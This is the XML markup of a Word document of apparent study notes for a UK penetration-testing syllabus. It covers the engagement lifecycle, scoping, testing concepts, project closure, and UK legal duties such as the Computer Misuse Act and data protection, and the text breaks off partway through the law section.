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BF" w:rsidRDefault="005F25BF"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34"/>
        <w:gridCol w:w="1984"/>
        <w:gridCol w:w="5670"/>
        <w:gridCol w:w="851"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F25BF" w:rsidTr="00EE3290">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="534"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70"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51"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A1</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Engagement Lifecycle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670"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Benefits and utility of penetration testing to the client.</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Structure of penetration testing, including the relevant processes and procedures.</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Concepts of infrastructure testing and application testing, including black box and white box formats.</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Project closure and debrief.</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A2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0039512C"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Law &amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005F25BF">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Compliance</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0039512C" w:rsidRPr="0039512C" w:rsidRDefault="0039512C" w:rsidP="0039512C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0039512C" w:rsidRPr="0039512C" w:rsidRDefault="0039512C" w:rsidP="0039512C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0039512C" w:rsidRPr="0039512C" w:rsidRDefault="0039512C" w:rsidP="0039512C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0039512C" w:rsidRDefault="0039512C" w:rsidP="0039512C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F25BF" w:rsidRPr="0039512C" w:rsidRDefault="005F25BF" w:rsidP="0039512C">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pP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Knowledge of pertinent UK legal issues:</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Computer Misuse Act 1990</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Human Rights Act 1998</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Data Protection Act 1998</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Police and Justice Act 2006</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Impact of this legislation on penetration testing activities.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Awareness of sector-specific regulatory issues.</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A3</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Scoping</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client requirements.</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Scoping project to fulfil client requirements.</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Accurate timescale scoping.</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Resource planning.</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A4</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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005F25BF">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Explaining and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005F25BF">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Managing Risk</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Knowledge of additional risks that penetration testing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005F25BF">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>can present.</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Levels of risk relating to penetration testing, the usual</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005F25BF">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>outcomes of such risks materialising and how to mitigate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005F25BF">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>the risks.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Effective planning for potential DoS conditions.</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A5</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Record Keeping,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005F25BF">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Interim</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005F25BF">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reporting &amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005F25BF">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Final Results</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reporting requirements.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the importance of accurate and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005F25BF">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>structured record keeping during the engagement.</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5F25BF" w:rsidRDefault="005F25BF" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F25BF" w:rsidRDefault="005F25BF" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F25BF" w:rsidRDefault="00B52DBC" w:rsidP="001223F3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>A1 – Engagement Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B52DBC" w:rsidRDefault="00B52DBC" w:rsidP="001223F3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>A1-a Benefits and utility of penetration testing to the client</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Highlight/identify existing and potential security risks</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 xml:space="preserve">Obtain recommendations to remove vulnerabilities and increase security and protection against attack. </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Can increase awareness of security issues within the client’s organisation to for staff or entire personnel base.</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Meet regulatory requirements such as HMG CHECK, JSP440, PCI/Mastercard, Sarbanes Oxley, HIPPA, ISO27001, etc.</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Satisfy external customers of the client that there system meets recognised security standards</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B52DBC" w:rsidRDefault="00B52DBC" w:rsidP="001223F3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>A1-b Structure of penetration testing, including the re</w:t>
      </w:r>
      <w:r w:rsidR="008F2F3E">
        <w:t>levant processes and procedures</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B52DBC" w:rsidRPr="00D1486B" w:rsidRDefault="00B52DBC"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Scoping the penetration test/security assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F43A34" w:rsidRPr="00D1486B" w:rsidRDefault="00B52DBC"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lastRenderedPageBreak/>
        <w:t>Understanding the system (size, individual technologies</w:t>
      </w:r>
      <w:r w:rsidR="00F43A34" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/components</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in use,</w:t>
      </w:r>
      <w:r w:rsidR="00F43A34" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> its use)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B52DBC" w:rsidRPr="00D1486B" w:rsidRDefault="00F43A34"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Understanding client requirements (threats, goals)</w:t>
      </w:r>
      <w:r w:rsidR="00B52DBC" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F43A34" w:rsidRPr="00D1486B" w:rsidRDefault="00F43A34"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 xml:space="preserve">Agreement on procedures, timings, locations, </w:t>
      </w:r>
      <w:r w:rsidR="00BA247B" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">client contacts, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and level of system knowledge (black/grey/white box testing).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B52DBC" w:rsidRPr="00D1486B" w:rsidRDefault="00F43A34"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Fulfilling legal requirements: NDAs, permission from all relevant parties, notifying relevant parties, etc</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Obtain permission to start assessment and then notification of start to client contacts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Perform testing (some or all of the following):</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 xml:space="preserve">Footprinting the organisation (name registration databases, Edgare, internet search engines, new groups, dns, social networking sites, etc) </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Target identification (host up scans, ICMP pings, traceroutes, quick TCP/UDP scans)</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Service enumeration (Full portscans, version scans, os/device identification)</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Web site/application enumeration</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Vulnerability identification – automated scanning and manual techniques</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Vulnerability exploitation  - if agreed with client</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA247B" w:rsidRPr="00D1486B" w:rsidRDefault="00B14B73"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Code review</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Immediate notification of high risk issues to client</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Daily debrief/summaries/reports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Notification of completion to testing</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Final debrief</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Final Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F43A34"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Presentation of findings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Ongoing technical support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B52DBC" w:rsidRDefault="00B52DBC" w:rsidP="00B52DBC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B14B73" w:rsidRDefault="00B14B73" w:rsidP="001223F3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A1-c Concepts of infrastructure testing and application testing, including </w:t>
      </w:r>
      <w:r w:rsidR="008F2F3E">
        <w:t>black box and white box formats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Infrastructure testing – Security review of network connected IT equipment including security/networking devices, servers, and workstations.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 xml:space="preserve">Application - Security review of computer program running on </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> IT system.</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Blackbox testing – Zero knowledge if internal workings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Whitebox testing - Detailed knowledge of internal workings, for example design specs or source code (application).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B52DBC" w:rsidRDefault="00B14B73" w:rsidP="001223F3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>A1-d Project closure and debrief</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B14B73" w:rsidRDefault="00B14B73" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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Remove anything that was introduced to the system during the testing including restoration of all configurations and settings.</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 xml:space="preserve">Secure storage of any evidence, results, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> obtained from system.</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Importance of being accurate results and reporting.</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Detailing findings in level relevant to ordinance</w:t>
      </w:r>
      <w:r w:rsidR="001223F3" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001223F3" w:rsidRPr="00D1486B" w:rsidRDefault="001223F3" w:rsidP="001223F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Secure removal of data within specified and agreed timeframe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B14B73" w:rsidRPr="00D1486B" w:rsidRDefault="00B14B73" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001223F3" w:rsidRDefault="001223F3">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001223F3" w:rsidRDefault="001223F3" w:rsidP="001223F3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A2 - </w:t>
      </w:r>
      <w:r w:rsidRPr="005F25BF">
        <w:t>Law &amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F25BF">
        <w:t>Compliance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001223F3" w:rsidRPr="005F25BF" w:rsidRDefault="008F2F3E" w:rsidP="001223F3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>A2</w:t>
      </w:r>
      <w:r w:rsidR="001223F3">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="001223F3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001223F3" w:rsidRPr="005F25BF">
        <w:t>Knowledge of pertinent UK legal issues:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A20836" w:rsidRDefault="001223F3" w:rsidP="00A20836">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F25BF">
        <w:t>Computer Misuse Act 1990</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A20836" w:rsidRPr="00D1486B" w:rsidRDefault="00A20836" w:rsidP="00A20836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Covers</w:t>
      </w:r>
      <w:r w:rsidR="002E17D9" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> intended</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> unauthorised access to a </w:t>
      </w:r>
      <w:r w:rsidR="00B477F8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">computer material. This includes </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>system, data on system, and data integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007603E8" w:rsidRPr="00D1486B" w:rsidRDefault="007603E8" w:rsidP="00A20836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Also covers unauthorised modification of</w:t>
      </w:r>
      <w:r w:rsidR="002E17D9" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> computer system or</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> data held on a computer system.</w:t>
      </w:r>
      <w:r w:rsidR="002E17D9" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> This includes impairing the operation of computer or program or preventing or hindering access to the system or data. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E17D9" w:rsidRPr="00D1486B" w:rsidRDefault="002E17D9" w:rsidP="00A20836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Unauthorised access to a computer system with intent to commit or facilitate further offences</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E17D9" w:rsidRPr="00D1486B" w:rsidRDefault="002E17D9" w:rsidP="002E17D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Need to ensure you have signed permission to access systems otherwise it is a breach of the Computer Misuse Act. Also be aware of restrictions in place i.e. time restraints and exclusions of specific data/systems. Additionally all parties involved must be aware and give authorisation/permission for testing i.e. web hosting, system, and data owners. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001223F3" w:rsidRDefault="001223F3" w:rsidP="001223F3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F25BF">
        <w:t>Human Rights Act 1998</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A20836" w:rsidRPr="00D1486B" w:rsidRDefault="00A20836" w:rsidP="00A20836">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Employees have a right to privacy while in their place of work.  This right may be breached during the pen-test due to network traffic capture, access to shared resources containing personal data, terminal services type access, etc. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E17D9" w:rsidRPr="00D1486B" w:rsidRDefault="002E17D9" w:rsidP="002E17D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The client contract should advise users that testers may gain access to private information.  The onus is then on the client to inform their employees about the testing if not covered by employment contracts warning of internet/mail/data logging and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001223F3" w:rsidRDefault="001223F3" w:rsidP="001223F3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F25BF">
        <w:t>Data Protection Act 1998</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A20836" w:rsidRPr="00D1486B" w:rsidRDefault="00A20836" w:rsidP="005B22D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Client must protect customer data under the data protection act therefore so must the testers. Use encrypted storage/transfer mediums (PGP encrypted emails, encrypted disks). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A20836" w:rsidRPr="00D1486B" w:rsidRDefault="00A20836" w:rsidP="005B22D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Delete data when no longer re</w:t>
      </w:r>
      <w:r w:rsidR="005B22D0" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">quired (i.e. pentesters should </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">delete data when final report has been issued, or client has been supplied with data in some cases). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001223F3" w:rsidRDefault="001223F3" w:rsidP="001223F3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F25BF">
        <w:t>Police and Justice Act 2006</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA6566" w:rsidRPr="00D1486B" w:rsidRDefault="00FA6566" w:rsidP="005B22D0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
